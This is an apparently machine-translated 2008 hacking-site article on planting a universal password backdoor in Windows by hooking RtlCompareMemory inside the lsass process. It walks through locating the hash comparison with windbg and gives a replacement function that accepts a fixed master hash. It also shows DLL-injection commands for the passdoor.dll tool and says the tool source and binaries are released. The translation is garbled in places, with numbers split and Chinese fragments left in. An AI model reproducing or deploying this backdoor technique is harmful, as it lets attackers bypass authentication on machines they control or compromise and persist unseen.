Use IAT hook to achieve universal windows password Backdoor-vulnerability warning-the black bar safety net

ID MYHACK58:62200819145
Type myhack58
Reporter 佚名
Modified 2008-05-25T00:00:00


Author: clyfish

windows has a generic password? Go ask bill uncle.

The first matter is not really there, we can implement such a backdoor.

Briefly explain the windows login process in some process. the winlogon process with gina. dll to obtain a user name and password, through the LPC passed to the lsass process. Then the lsass process to call the default authentication package is msv1_0. dll to verify that the password is right or wrong. And msv1_0 is from the SAM to obtain the user information, including password hashes.

To achieve such a back door, the first to find the login authentication this series of a function of the bottom-most one, then there tricks to. Obviously, this is the bottom-most function in the lsass process msv1_0. dll module.

lsass calls the msv1_0. dll is this function:


msv1_0! LsaApLogonUserEx2

LsaApLogonUserEx2 in MSDN

Then we should debug the lsass process and then at msv1_0! LsaApLogonUserEx2 the next breakpoint. Here I use windbg and vmware and the use dbgsrv remote user mode debugging. The above Spat in the blog describes how to use dbgsrv debugging Debugging LSA via dbgsrv.exe in. In the virtual machine being debugged end of the run


dbgsrv. exe-t tcp:port=1 2 3 4,password=spat

Then in the Debug end of the run


windbg. exe-premote tcp:server=,port=1 2 3 4,password=spat

Then select additional lsass processes. But here we can't login again after running dbgsrv, that dbgsrv is off, so I use windows Task Scheduler to let the dbgsrv boot it up and running.

The virtual machine starts, dbgsrv is also up, then with windbg connected and attach the lsass process. The next breakpoint msv1_0! LsaApLogonUserEx2, let lsass continues to run. And then the landing, and sure enough windbg break down.

This time to introduce windbg is a powerful command, that is wt, it can all record the function call relationship, has been recorded to the ret, the specific usage please see the windbg help. I guess wt is a single-step run, it is very slow. But wt the output of the text very much, too ugly, so I wrote a python script to put the wt of the output go into a TreeCtrl

Everyone look at my mouse point on that function: ntdll! RtlCompareMemory it. After debugging I found that this function is what I'm looking for the“bottom function”.


SIZE_T RtlCompareMemory( IN CONST VOID Source1, IN CONST VOID Source2, IN SIZE_T Length );

RtlCompareMemory in MSDN And I also found the authentication password when this function 3 parameter details Source1 is from the SAM to remove the user password of the Unicode form of the md4 hash, Source2 is the password entered by the user the Unicode form of the md4 hash, Length is always 1 6, because the md4 hash is 1 6 bits. Easy I wrote the following this alternative function:


int WINAPI MyRtlCompareMemory(void a, void b, int len) { if (len == 1 6 && pRtlCompareMemory(PASSWD_HASH, b, len) == 1 6) return 1 6; return pRtlCompareMemory(a, b, len); }

Wherein pRtlCompareMemory is a global variable that is truly of RtlCompareMemory address, PASSWD_HASH is a General purpose cryptographic hash. Use MyRtlCompareMemory to hook off RtlCompareMemory, you can achieve predetermined functions. If you want to compare is 1 6 bits, and the second segment of memory and our hash the same as that on the direct release, regardless of the first segment of memory is nothing. Maybe have friends will ask, you this is the hook of the msv1_0 module all call RtlCompareMemory place, not error? Rest assured, where there are so clever, you want to compare is a 1 6-bit and second segment of memory and our hash exactly the same for?

To hook this function, there are a lot of ways, the I chose the most lazy one, the IAT hook+dll injection. So I wrote a small tool to inject dll: DllInject


C:\Documents and Settings\cly\desktop\bin>InjectDll.exe InjectDll v0. 1 Inject/UnInject a dll file to a process, by cly, at 2 0 0 8 0 5 2 2 Usage: InjectDll. exe (-i | -u | -U) pid filename -i: Inject -u: UnInject once -U: UnInject at all

passdoor. dll is to be injected into the lsass process's dll, this dll in DllMain to achieve a IAT hook, the very soil of the technology, just not posted the code, and online a search with a Laundry list。

And then I wrote a small tool: pdconfig Is actually a modified passdoor. dll in the hash, 以免要换密码是又要重新编译passdoor.dll the.

Method of use:


InjectDll. exe-i pid_of_lsass full_path_of_passdoor.dll

Uninstall method:


InjectDll. exe-U pid_of_lsass full_path_of_passdoor.dll Here is the article related to the tool source code and compiled binary files. 其中 包括 InjectDll.exe, passdoor.dll 和 pdconfig.exe all code are using MingW gcc4. 2. 1 compilation.